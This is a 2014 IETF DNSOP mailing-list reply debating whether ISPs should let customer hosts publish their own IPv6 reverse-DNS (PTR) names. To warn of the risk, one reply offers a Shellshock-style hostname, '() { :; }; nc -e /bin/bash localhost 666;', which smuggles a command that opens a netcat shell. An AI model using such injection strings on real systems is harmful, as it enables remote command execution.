Re: [DNSOP] Draft Reverse DNS in IPv6 for Internet Service Providers

Thu, 30 Oct 2014 14:48:13 -0700 

On Thu, Oct 30, 2014 at 5:26 PM, Lee Howard <l...@asgard.org> wrote:
>
>
> On 10/23/14 5:17 PM, "Mark Andrews" <ma...@isc.org> wrote:
>
>>
>>In message <d06e91ee.72e46%...@asgard.org>, Lee Howard writes:
>>>
>>> From:  Mwendwa Kivuva <kiv...@transworldafrica.com>
>>> Date:  Thursday, October 23, 2014 7:23 AM
>>> To:  dnsop <dnsop@ietf.org>
>>> Subject:  [DNSOP] Draft Reverse DNS in IPv6 for Internet Service
>>>Providers
>>>
>>> > Refering to the draft by Lee Howard
>>> > https://tools.ietf.org/html/draft-howard-dnsop-ip6rdns-00
>>> >
>>> > and given the weakness of the Reverse DNS access for security
>>>purposes, wha
>>> t
>>> > problem is this draft trying to solve?
>>>
>>> There is a common expectation that ISPs will populate PTR records for
>>>their
>>> customers.
>>>
>>> In my opinion, that is an unreasonable expectation, since ISPs do not
>>>have
>>> host names for customers, so they usually make up a name. That seems
>>>pretty
>>> useless to me. However, I don't think that is a consensus opinion, so
>>>it's
>>> not what the draft says.
>>
>>But it is not unreasonable to delegate a zone or to accept DNS UPDATE
>>requests
>>from the host you have just assigned a IP address to over TCP.
>
> Not sure of the antecedent of "you."  If "you" are a DHCPv6 server, you
> are not necessarily a DNS server authoritative for the ip6.arpa zone in
> question and capable of accepting DNS updates. Especially if "you" are a
> DHCPv6 server on a home router.
>
> You (Mark Andrews, not the servers) have proposed mechanisms for
> facilitating that communication; that would help.
>
>>
>>       zone "ip6.arpa" {
>>               update-policy { grant * tcp-self * ptr; };
>>       };
>>
>>       reverse=`arpaname ${ip_address}`
>>       hostname=`hostname`
>
>
> And residential hosts only know hostname, not domain name; is
> "myMacBook.local" useful as a PTR?

How about  '() { :; }; nc -e /bin/bash localhost 666;' or
'TimeWarnerCableSux.local' or 'bigbank.net'

Allowing users to publish this may end poorly...

W

>  I haven't checked with users of PTRs
> to see what they think.
>
>
> Lee
>
>
> _______________________________________________
> DNSOP mailing list
> DNSOP@ietf.org
> https://www.ietf.org/mailman/listinfo/dnsop



-- 
I don't think the execution is relevant when it was obviously a bad
idea in the first place.
This is like putting rabid weasels in your pants, and later expressing
regret at having chosen those particular rabid weasels and that pair
of pants.
   ---maf

_______________________________________________
DNSOP mailing list
DNSOP@ietf.org
https://www.ietf.org/mailman/listinfo/dnsop

Reply via email to